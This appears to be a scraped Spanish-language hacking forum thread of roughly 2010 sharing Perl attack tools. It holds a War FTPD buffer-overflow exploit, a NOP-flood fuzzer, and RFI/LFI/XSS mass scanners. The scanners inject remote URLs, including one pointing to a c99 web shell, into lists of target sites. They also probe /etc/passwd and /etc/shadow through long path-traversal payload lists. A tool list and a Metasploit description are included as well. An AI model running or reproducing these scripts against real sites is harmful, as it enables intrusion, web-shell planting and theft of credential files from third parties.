  Please enter your user name.: Como nos muestra en todo el analisis, empieza a verificar si puede producirse un buffer overflow por la cantidad de caracteres en el user o password, y empieza a chequear cuantos, caracteres nececita para poder provocar esta vulnerabilidad.

  Luego Detecta una Vulnerabilidad, por la cantidad de caracteres introducidos en el username. alrededor de 1000 caracteres.

[idea] Tambien navegando por Internet encontre informacion que confirmo mi analisis sobre el Fuzzer.

[idea] Esta vulnerabilidad fuese tenido alguna utilidad  hace 9 años, porque fue descubierto en 1998, busque y busque y no encontre un exploit, con conocimiento basico sobre perl se pudo codear este exploit, lo cual hago mension aqui, es mi primer exploit, aunque no tiene ninguna utilidad para explotar algun ordenador que este corriendo este servicio, pero si de uso educacional.

  Una ves Analizado el Resultado del Fuzzer, y respaldado por el Bugtraq, ahora podemos crear nuestro exploit.

Exploit War FTPD 1.65 Buffer Overflow By OzX [Perl]

Código: php
#!/usr/bin/perl
# ===============================================================================================
#                            War FTPD 1.65
#                               By OzX
# ==============================================================================================
# Referencia: http://seclists.org/bugtraq/1998/Feb/0013.html
# Windows 95/NT War FTPD 1.65 Buffer Overflow
# Exploit Diseñado para el Manual de Fuzzer: Buscando Vulnerabilidades
# www.new-Bytes.net
# #================================================================================================
use strict;
use Net::FTP;

my $username = "////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////";
my $pwd = "exploit";
my $ftp = Net::FTP->new("localhost") or die("No se pudo conectar al servidor, porque el user y pass no eran correctos \n, pero se logro la intencion de crear el buffer overflow : $!");
$ftp->login($username,$pwd) or die("Login incorrecto: $!");
$ftp->quit or die("No se puede desconectar del servidor: $!");


  Bueno Aqui les Dejo un Video en donde Demuestra que el Exploit Funciona a la Perfeccion.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




[idea] Saludos, y Ojala que entiendan mi Adaptacion, la creacion del Exploit y todo lo demas, la siguiente semana lo volvere a revisar para seguir expandiendolo ya que el tema da para mucho mas,tambien para que se paresca menos al paper original y se expanda, aunque de forma de introduccion es bastante bueno.

Propiedad de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#34
Código: perl
#!/usr/bin/perl

# By Xianur0

  use IO::Socket;
my $host = $ARGV[0];
my $puerto = $ARGV[1] || die("Uso: fuzzerbof.pl [ip] [puerto]\n");
my $nop = "\x90";
for($i=1;$i<1000000;$i++) {
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
$paquete = $nop x $i;
print $sock $paquete;
if(!$sock) {
print "Conexion Muerta al enviar $i bytes!\n";
} else { print "Conexion Viva a $i bytez\n"; close($sock);}
}
#35
Bugs y Exploits / Que es un FUZZER y para que sirve
Febrero 25, 2010, 11:54:47 AM
Herramientas de seguridad

Un fuzzer es un programa que intenta descubrir vulnerabilidades de seguridad enviando una entrada arbitraria a una aplicacion. Si el programa contiene una vulnerabilidad que puede conducir a una excepción, el choque o el error de servidor (en el caso de web apps), puede ser determinado que una vulnerabilidad ha sido descubierta. Fuzzers a menudo son llamados Inyectores de Falta por esta razón, ellos generan faltas y les envían a una aplicacion. Generalmente los fuzzers están bien para el encuentro de buffer overflow, DoS, SQL Injection, XSS, y bugs Format String . Ellos hacen un trabajo pobre en el encuentro de vulnerabilidades relacionada con el descubrimiento de la información, defectos de cifrado y cualquier otra vulnerabilidad que no hace que el programa se estrelle.

Contra lo que pueda parecer, el sistema no es nuevo. Fuzz, desarrollado en 1990 por Barton Miller en la Universidad de Wisconsin en Madison, pasa por ser el primer fuzzer, pero hoy en día se cuentan por decenas los programas de este tipo, utilizados generalmente en tests de penetración...

Pero, ¿cuál es la efectividad de los fuzzers contra los navegadores web? Sencillamente extraordinaria. Por poner un ejemplo, en pocas semanas H.D. Moore (investigador de seguridad creador y responsable del Metasploit Project), asegura haber encontrado cientos de formas de colgar Internet Explorer, y en menor medida el resto de navegadores.

La siguiente es una lista de programas fuzzers con una breve explicacion:

    * (L)ibrary (E)xploit API - lxapi

Una coleccion de Scripts en python para fuzzing
Mangle

Un fuzzer para generar etiquetas de HTML impares, esto también autolanzará un navegador. El programa encontró el infame IFRAME IE bug.
SPIKE - Una colección de muchos fuzzers de Inmunidad. Usado para encontrar el reciente remoto RDP kernel DoS against a firewalled XP SP2, y muchos otros.
PROTOS WAP - Un fuzzer del proyecto PROTOS para fuzzing WAP
PROTOS HTTP-reply - Otro fuzzer de los tipos PROTOS para ataque/ respuestas de HTTP, útiles para broswer vulns.
PROTOS LDAP - Para fuzzing LDAP, no tan acertado como los demás del proyecto PROTOS
PROTOS SNMP - Clasico SNMP fuzzer, encontrando una vuln en casi cada engranaje conectado a una red disponible en el tiempo (2002).
PROTOS SIP - Para fuzzing a todos aquellos nuevos dispositivos de VOIP SIP que usted ve por todas partes.
PROTOS ISAKMP - Para atacar implementaciones IPSec.
RIOT & faultmon - Para atacar protocolos de texto simples (Telnet, HTTP, SMTP). Usado por Riley Hassell cuando él trabajó en eEye para descubrir el IIS .printer overflow e incluido en The Shellcoder's Handbook.
SPIKE Proxy - Un semi-funcional web fuzzer del Inmunidad que trajo el original SPIKE
Tag Brute Forcer - Fuzzer imponente de Drew Copley de eEye para atacar ActiveX en uso. Usado para encontrar un manojo de bugs en IE, incluyendo unos realmente poderosos para alcanzar heap overflows.
FileFuzz - Un formato de archivo fuzzer para PE (windows) binarios de iDefense. Tiene bonito GUI. Recientemente usado para encontrar bugs en Word.
SPIKEFile - Un formato de archivo fuzzer para ataque ELF (Linux) binarios de iDefense. Basado en SPIKE
notSPIKFile - Un ELF fuzzer estrechamente relacionado con FileFuzz, en vez de usar SPIKE como un punto de partida.
Screaming Cobra -El nombre hace al fuzzer parecer mejor de lo que realmente es, pero está bien para encontrar bugs CGI. También,es un perl script fácil de modificar o extenderse.
WebFuzzer -Un fuzzer para (adivina qué?) web app vulns.
eFuzz - Un fuzzer para el protocolo generico TCP/IP. Fácil de usar, pero tal vez no tan destacado como otros de esta lista.
Peach Fuzzer - Gran fuzzer escrito por Michael Eddington. Este Fuzzer es más un marco para construir otros fuzzers.
Fuzz - El ORIGINAL fuzzer desarrollado por Dr. Barton Miller que fue el Alma Matter, de la University of Wisconsin-Madison en 1990.
Fuzzball2 un pequeño fuzzer para TCP e IP. Esto envía un manojo de paquetes más o menos falsos a la host de su eleccion.
Fuzzer version 1.1 es una herramienta para fuzzing de multiple protocolo escrita en python.Esto puede ser usado encontrar SQL injection, format string, buffer overflow, directory traversal, y otras vulnerabilidades.
Scratch es un destructor de protocolo avanzado ("fuzzer") que rutinariamente puede encontrar una amplia variedad de vulnerabilidades de un paquete simple. El programa hace el análisis de complejos archivos binarios. También viene con un marco para protocolos fuzzing binarios como SSL Y SMB.

* Nessus

Auditor de Seguridad Remoto. El cliente "The Nessus Security Scanner" es una herramienta de auditoría de seguridad. Hace posible evaluar módulos de seguridad intentando encontrar puntos vulnerables que deberían ser reparados. Está compuesto por dos partes: un servidor, y un cliente. El servidor/daemon, "nessusd" se encarga de los ataques, mientras que el cliente, "nessus", se ocupa del usuario por medio de una linda interfaz para X11/GTK+. Este paquete contiene el cliente para GTK+1.2, que además existe en otras formas y para otras platarformas.

   
* Netcat

Una navaja multiuso para TCP/IP. Una utilidad simple para Unix que lee y escribe datos a través de conexiones de red usando los protocolos TCP o UDP. Está diseñada para ser una utilidad del tipo "back-end" confiable que pueda ser usada directamente o fácilmente manejada por otros programas y scripts. Al mismo tiempo, es una herramienta rica en características útil para depurar (debug) y explorar, ya que puede crear casi cualquier tipo de conexión que puedas necesitar y tiene muchas características incluídas.

Tcpdump

Una poderosa herramienta para el monitoreo y la adquisición de datos en redes. Este programa te permite volcar (a un archivo, la pantalla,etc.) el tráfico que presenta una red. Puede ser usado para imprimir los encabezados de los paquetes en una interfaz de red ("network interface") que concuerden con una cierta expresión. Se puede usar esta herramienta para seguir problemas en la red, para detectar "ping attacks" o para monitorear las actividades de una red.

* Snort

un Sniffer/logger de paquetes flexible que detecta ataques. Snort está basado en la biblioteca `libpcap' y puede ser usado como un "sistema de detección de intrusiones" (IDS) de poco peso. Posee un registro basado en reglas y puede buscar/identificar contenido además de poder ser usado para detectar una gran variedad de otros ataques e investigaciones (probes), como buffer overflows, barridos de puertos indetectables (stealth port scans), ataques CGI, pruebas de SMB (SMB probes), y mucho más. Otra característica importante de Snort es la capacidad de alertar en tiempo real, siendo estas alertas enviadas a syslog, un archivo de alerta separado o incluso a una computadora con Windows a través de Samba.

* Ethereal

Ethereal es un analizador de tráfico de redes, o "sniffer" para Unix y Sistemas operativos del tipo Unix. usa GTK+, una biblioteca de interfaz gráfica para el usuario (GUI), y libcap, una bliblioteca que facilita la captura y el filtrado de paquetes.

* Whisker

El excelente escáner de vulnerabilidades en CGI de Rain.Forest.Puppy.

* Abacus Portsentry

Este demonio de detección de barrido de puertos tiene la habilidad de detectar estos barridos (incluyendo "stealth scans") en las interfaces de red de tu máquina. Como medida de alarma, puede bloquear al atacante por medio de "hosts.deny", bloqueando el ruteo hacia la máquina hostil o por medio de reglas de firewall. Es parte del set de programas "Abacus". Nota: Si no tenés idea de qué es una port/stealth scan, te recomiendo darte una vuelta por Psionic antes de instalar este paquete. De otra forma, podrías fácilmente bloquear cualquier host que no deberías. (por ej. tu servidor de NFS, tu servidor de DNS, etc.)

* DSniff

Un comprobador de integridad de archivos y directorios. Tripwire es una herramienta que ayuda a administradores y usuarios de sistemas monitoreando alguna posible modificación en algún set de archivos. Si se usa regularmente en los archivos de sistema (por ej. diariamente), Tripwire puede notificar a los administradores del sistema, si algún archivo fue modificado o reemplazado, para que se puedan tomar medidas de control de daños a tiempo.

* Hping2

hping2 es una herramienta de red capaz de enviar paquetes ICMP/UDP/TCP hechos a medida y de mostrar las respuestas del host destino de la misma manera en la que lo hace la herramienta `ping' los las respuestas de ICMP. Puede manejar fragmentación y tamaños y cuerpo arbitrarios de paquetes; además puede ser utilizado para transferir archivo usando protocolos soportados. Al usar hping2, se puede: evaluar el desempeño de la red utilizando diferentes protocolos, tamaños de paquetes, TOS (type of service, o sea, tipo de servicio), y fragmentación; realizar descubrimiento de camino utilizando el campo MTU (onda traceroute); transferir archivos (incluso ante reglas de firewall muy fascistas); realizar funciones al estilo `traceroute' pero bajo diferentes protocolos; detección remota de OS (`remote OS fingerprinting'); auditar una implementación de TCP/IP (`TCP/IP stack') en particular; etc. hping2 es una buena herramienta para aprender acerca de TCP/IP.

* SARA

El Asistente de Investigación para el Auditor de Seguridad (Security Auditor's Research Assistant) es una herramienta de análisis de seguridad de tercera generación que está basada en el modelo de SATAN y distribuída bajo una licencia del estilo de la GNU GPL. Promueve un ambiente colaborativo y es actualizada periódicamente para tener en cuenta las últimas amenazas.

* Sniffit

Una herramienta de monitoreo y "packet sniffer" para paquetes de TCP/UDP/ICMP. sniffit es capaz de dar información técnica muy detallada acerca de estos paquetes (SEC, ACK, TTL, Window, ...) pero también los contenidos de los paquetes en diferentes formatos (hex o puro texto, etc.).

* IPFilter

IP Filter es un filtro de paquetes de TCP/IP, adaptable para uso en un ambiente de firewall. Puede ser utilizado como una módulo de kernel o incorporado en tu kernel de UNIX; es áltamente recomendable utilizarlo como un módulo de kernel. Viene junto con scripts para instalarlo y parchar archivos de sistema, si se require.

* Iptables/netfilter/ipchains/ipfwadm

Administradores de los filtros de paquetes de IP para kernels 2.4.X. iptables se usa para configurar, mantener e inspeccionar las tablas de reglas de filtrado de paquetes de IP en Linux. La herramienta iptables también soporta configuración de NAT (Network Address Translation) dinámica y estática.

* Firewalk

Firewalking es una técnica desarrollada por MDS y DHG que emplea técnicas del estilo de `traceroute' para determinar las reglas de filtrado que se están usando en un dispositivo de transporte de paquetes (NdelT: quise traducir "packet forwarding device"). La última versión de esta herramienta, fierwalk/GTK incluye la opción de usar una interfaz gráfica y nuevos arreglos a errores.

* Strobe

Un "clásico" escáner de puertos de TCP de alta velocidad.

* Jonh the Ripper

Una herramienta activa para crackear passwords. Útil para encontrar passwords débiles de tus usuarios.

* Ntop

Muestra la utilización de la red al estilo de la herramienta `top'. Muestra un sumario del uso de la red de las máquinas en ella en un formato que recuerda a la utilidad de unix `top'. También puede ser utilizada en un `web mode', que permite ver los resultados a través de un explorador de web.


Top 15 con las mejores tools o scanners de sql injection free.



* SQLIer
* SQLbftools
* SQL Injection Brute-forcer
* SQLBrute
* BobCat
* SQLMap
* Absinthe
* SQL Injection Pen-testing Tool
* SQID
* Blind SQL Injection Perl Tool
* SQL Power Injection
* FJ-Injector Framwork
* SQLNinja
* Automagic SQL Injector
* NGSS SQL Injector

[/b][/color]
FUENTE:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

VIDEO
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#36
Bugs y Exploits / Scaner RFI and LFI by D4NB4R
Febrero 25, 2010, 11:52:46 AM
bue aki les dejo un scaner espero sirva

Código: perl
#!/usr/bin/perl -w
#######################################
#

#     * coded by : D4NB4R

#

#     * Contact: [email protected]

#

#     * Greetz :  Pandora's Box Team  ; CCT TEAM ; Remoteexecution ; Clubhacker ; E-r00t ; Mitm

########################################
#------------------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
########################################
#------------------------------------------------------------------------------------#
########################################
$sis="eq linux";
$cmd="clear";
$cmd="cls";
system("$cmd");
########################################
#------------------------------------------------------------------------------------#
########################################
print "                                            \n";
print "       ---------------------------------------------------- \n";
print "      |                                            *       | \n";
print "      |  ****   *   *   * *****  ***** ****     *  *  **** |            \n";
print "      |  *  *  * *  **  *  *   * *   * *   *   * *   *     | \n";
print "      |  **** * * * * * *  *   * *   * * **   * * *   ***  | \n";
print "      |  *    *   * *  **  *   * *   * *   *  *   *      * |  \n";
print "      |  *    *   * *   * *****  ***** *    * *   *  ***** |    \n";
print "       ----------------------------------------------------     \n";
print "                       :::Options:::\n\n";
print "                      1.  RFI  2.  LFI\n";
########################################
#------------------------------------------------------------------------------------#
########################################
print ":::Option::: ";
########################################
#------------------------------------------------------------------------------------#
########################################
my $option=<STDIN>;
if ($option==1){&RFI}
if ($option==2){&LFI}
########################################
#------------------------------------------------------------------------------------#
########################################
#######
# RFI #
###############################################
#------------------------------------------------------------------------------------#
########################################
sub RFI {
#
print "\n----------------------------------------------------\n";
print "|                       RFI                        |\n";
print "----------------------------------------------------\n";
print "\Introdusca el .txt donde esta la url a escanear\n";
###############################################
#------------------------------------------------------------------------------------#
########################################
$lista=<STDIN>;
chomp($lista);
#
system("$cmd");
#
print "...Escaneando...\n\n";
#
open(LISTA, "$lista");
while(<LISTA>) {
#
my $lista = $_;
chomp $lista;
#
my $rfi= "http://63.247.72.196/cmd?";
#
my $url=$lista.$rfi;
#
my $req=HTTP::Request->new(GET=>$url);
my $ua=LWP::UserAgent->new();
$ua->timeout(20);
my $resposta=$ua->request($req);
#
if($resposta->content =~ /pandora's/){
print "[+] * Encontrado * $url\n";
open(a, ">>RFI.txt");
print a "$url\n";
close(a);
  }else{ print "[-] * No vulnerable * $url\n"; }
}
###############################################
#------------------------------------------------------------------------------------#
########################################
}
#
#######
# LFI #
###############################################
#------------------------------------------------------------------------------------#
########################################
sub LFI {
#
print "\n----------------------------------------------------\n";
print "|                       Lfi                        |\n";
print "----------------------------------------------------\n";
#
print "introdusca el .txt donde esta la url a escanear\n\n";
###############################################
#------------------------------------------------------------------------------------#
########################################
chomp($lista = <STDIN>);
#
system("$cmd");
#
print "....Escaneando....\n\n";
#
open(LISTA, "$lista");
while(<LISTA>) {
#
my $lista = $_;
chomp $lista;
#
@lfi= ('/etc/passwd',
       '/etc/passwd%00',
       '../../../../../../../../../../../../../../../etc/passwd',
       '../../../../../../../../../../../../../../../etc/passwd%00');
#
foreach $bug(@lfi){
#
my $url=$lista.$bug;
#
my $req=HTTP::Request->new(GET=>$url);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
#
if($response->content =~ /root:x:/ ||
$response->content =~ /root:*:/ ||
$response->content =~ /root:!:/){
print "[+] * Encontrado * $url\n";
open(a, ">>LfI.txt");
print a "$url\n";
close(a);
}else{
print "[-] * No Vulnerable * $url\n";}
  }
}
}
########################################
#-------------------Scaner by D4NB4R --------------------#
########################################
#37
Bugs y Exploits / Metasploit Framework 3.2
Febrero 25, 2010, 11:45:25 AM

¿Qué es?
El Metasploit Framework es una plataforma de desarrollo para la creación de herramientas de seguridad y vulnerabilidades. El Framework es utilizado por profesionales de la seguridad de la red para realizar pruebas de vulnerabilidades, los administradores de sistemas para verificar las instalaciones de parches, los proveedores de productos para realizar pruebas de regresión, los investigadores y la seguridad en todo el mundo. El Framework está escrito en el lenguaje de programación Ruby e incluye componentes escritos en C y ensamblador.

¿Qué hace?
El Framework consta de herramientas, bibliotecas, módulos, y las interfaces de usuario. La función básica del Framework es un módulo lanzador, lo que permite al usuario configurar un módulo de explotar y poner en marcha en un sistema de destino. Si la explotación de éxito, la carga útil se ejecuta en el blanco y el usuario dispone de un depósito de interactuar con la carga útil.

framework-3.2.exe (win32)No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
framework-3.2.tar.gz (unix)No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#38
Bugs y Exploits / Moe Multi-Scanner by Guason
Febrero 25, 2010, 11:42:42 AM
Guason ah terminado su multi-scanner in perl. Espero q les sirva.

Este scanea
                 RFI
                 XSS
                 LFI (No disponible)

Entre otras opciones permite el scaneo single (solo una web) o un file para mayor comodidad con varias webs

El resultado se obtiene en el disco C "c:/"

Aca el code


Código: php
#Name program = moe.pl
#Version = beta
#Autor = Guason
#Version = 1.0

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

menu:

system ("cls");
system (" mode con cols=150");
system ("mode con lines=100");

print q (


11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111110000000010111111111111111111     ----------SINGLE SCAN-------------
11111111111111111111100000000000001111111111111111
11111111111111111111100000000000001111111111111111      1 - Scan XSS
11111111111111111111000110000100000111111111111111      2 - Scan LFI
11111111111111111110001000011011100011111111111111      3 - Scan RFI
11111111111111111000000000000000010011111111111111     
11111111111111110000000100000000000011111111111111
11111111111111111000000000000000000111111111111111     --------------------------------------------
11111111111111110000000100000000000011111111111111
11111111111111110000000001010000000000011111111111
11111111111111110000001001111100000000011111111111
11111111111111110000000001111111011100011111111111    --------MULTIPLE SCAN----------
11111111111111111100000001111111001111111111111111
11111111111111111000010000000000001111111111111111        4 - Multiple scan XSS
11111111111111111110010000000000000011111111111111        5 - Multiple scan LFI  (NO)
11111111111111111111100000000000000011111111111111        6 - Multiple scan RFI
11111111111111111111100000000000000000111111111111       
11111111111111111111000000000000000000111111111111
11111111111111111111100000000000000000001111111111    --------------------------------------------
11111111111111100111100000000000000000001111111111
11111111111111110011110000000000011001111111111111
11111111111111111011111000000111111111111111111111
11111111111111111001111110001111111111111111111111
11111111111111111101111111111111111111111111111111
11111111111111111100111110000011111111111111111111
11111111111111111110111111010101111111111111111111   -----------------------------------------------
11111111111111111110011100000011111111111111111111
11111111111111111110011100110111111111111111111111            7  - About x
11111111111111111110001111110011111111111111111111           8 - Salir del programa
11111111111111111111111111111011111111111111111111
11111111111111111111111111111001111111111111111111
11111111111111111111001111111001111111111111111111  ---------------------------------------------
11111111111111111111001111111101111111111111111111
11111111111111111111001111111101111111111111111111     Autor = Guason
11111111111111111111011111111111111111111111111111
11111111111111111111011111111111111111111111111111
11111111111111111111011111111111111111111111111111

);


print "\n\n";
print "Escoge opcion =";
$opcion = <STDIN>;
chomp $opcion;
print "\n";

if ($opcion == 1 ) { &xss }
if ($opcion == 2 ) { &lfi }
if ($opcion == 3 ) { &rfi }
if ($opcion == 4 ) { &m_xss }
if ($opcion == 5 ) { &m_lfi }
if ($opcion == 6 ) { &m_rfi }
if ($opcion == 7 ) { &about }
if ($opcion == 8 ) { &salir }




if ($opcion =! 1||2||3||4||5||6||7||8) {goto menu ;}





sub lfi {
system ("cls");
print  "\n\n";
print "Pagina web a probar con LFI :::";
$lfi = <STDIN>;
chomp $lfi;
print "\n\n";

print "Objectivo : $lfi\n\nn";



if($lfi !~/http:\/\//){
     $lfi ="http://$lfi";}
@devil=(
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../..etc/passwd%00',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user'
);
foreach $scan(@devil)
{

$run=$lfi.$scan;

print "Probando con $scan\n";

$request =HTTP::Request->new(GET=>$run);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/root:x:/){

print "\n\n";
print "$lfi = Vulnerable\n";



}
}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;

}


sub xss {

system ("cls");
print "\n\n";
print "Escribe la web a explotar con XSS::";
$xssans = <STDIN>;
chomp $xssans;
print "\n\n";

print "Objectivo = $xssans\n\n";

$xsscode='>"<script>alert("Guason")</script><div style="1';
$xss=$xssans.$xsscode;
$agent=LWP::UserAgent->new();
$req=$agent->get("$xss");
if($req->is_success && $req->content=~/Guason/){
print "\n\n";
print "$xssans es Vulnerable\n\n";

} else {
print "\n\n";
print "No es vulnerable\n\n";
}


syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;

}


sub rfi {

system ("cls");
print  "\n\n";
print "Url de la web a explotar con RFI::";
$rfi = <STDIN>;
chomp $rfi;
print "\n\n";

print "Objectivo  = $rfi\n\n";


$rficode="http://younes.by.ru/c99.txt";
$rfid=$rfi.$rficode;
$request =HTTP::Request->new(GET=>$rfid);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/c99/){

print "\n\n";
print "Es vulnerable !\n";


}  else {
print "\n\n";
print "No es vulnerable\n\n";
}



syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}

################################LFI_M is obsolete ########################################33


sub m_lfi {



print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}


sub m_xss {

print "\n\n";
print "Url de los googles para XSS:";
$xss= <STDIN>;
chomp $xss;


open ( M_XSS , ">>c:/m_xss.txt" ) ;
print M_XSS "Extrayendo vulnerabilidades XSS de $xss\n\n";

open ( HOLA , $xss ) ;
@googles = <HOLA>;
close HOLA;

foreach $xsss(@googles){

$xsscode='>"<script>alert("Guason")</script><div style="1';
$xss=$xsss.$xsscode;
$agent=LWP::UserAgent->new();
$req=$agent->get("$xss");
if($req->is_success && $req->content=~/Guason/){

print "$xsss = Yes!\n";
print M_XSS "$xsss = Yes!\n";
} else {

print "$xsss = No!\n";
print M_XSS  "$xsss = No!\n";
}

}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}


sub m_rfi {

print "\n\n";
print "Url de los googles para RFI:";
$rfi= <STDIN>;
chomp $rfi;


open ( M_RFI , ">>c:/m_rfi.txt") ;
print M_RFI "Extrayendo vulnerabilidades RFI de $rfi\n\n";

open ( HOLA , $rfi ) ;
@googles = <HOLA>;
close HOLA;



foreach $rfis(@googles) {

$rficode="http://younes.by.ru/c99.txt";
$rfid=$rfis.$rficode;
$request =HTTP::Request->new(GET=>$rfid);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/c99/){

print "$rfis = Es vulnerable\n";
print M_RFI "$rfis = Es vulnerable\n";

} else {

print "$rfis = No es vulnerable\n";
print M_RFI "$rfis = No es vulnerable\n";

}


}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}



sub about {
system ("cls");
print q (

@@@@@@@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@   *@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*  ***@*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@***@@@@@*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@**@@@@@@@@*@@@@@@@@@@@@
@@@@@@@@@@@@@@@ *@@@@@@@@@@ @@@@@@@@@@@@
@@@@@@@@@@@@@@@**@@@@@@@@@@**@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@@@@@@**@@@@@@@@@@
@@@@@@@@@@@@@@@@**@@@@@@@@@@@**@@@@@@@@@
@@@@@@@@@@@@@@@@@ @@@@@@*****@@@@@@@@@@@
@@@@@@@@@@@@@@@@@**@@@@*@@@* @@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ @@@@*@@@@**@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@@@*@@@@   @@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@** *@@    @@@@@@@@@
@@@@@@@@@@@@@@@@@@@*            @@@@@@@@
@@@@@@@@@@@@@@@@@@@             @@@@@@@@
@@@@@@@@@@@@@@@@@@@             @@@@@@@@
@@@@@@@@@@@@@@@@@@@@         *@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@       *@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@           @@@@@@@@@@@
@@@@@@@@@@@@@@@@**@@@*@   *@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@    @@@@@@@@@@@@@
@@@@@@@@@@@@@@@* *@@@@@ @@*@@@@  @@@@@@@
@@@@@@@@@@@@@@@   *@@@@@@@@@@@@   @@@@@@
@@@@@@@@@@@@@@@    @*@@@@@@@@@    @@@@@@
@@@@@@@@@@@@@@@     @@@@@@@@@@    *@@@@@
@@@@@@@@@@@@@@@     @@@@@@@@@@*   @@@@@@
@@@@@@@@@@@@@@@       @@@@@@@@@   @@@@@@
@@@@@@@@@@@@@@@       *@@@@@@@@  *@@@@@@
@@@@@@@@@@@@@@        @@@@@@@@@  *@@@@@@
@@@@@@@@@@@@@@  @ *  *@@@@@@@@@  *@@@@@@
@@@@@@@@@@@@****@ *@@@@@@@@@@@* ***@@@@@
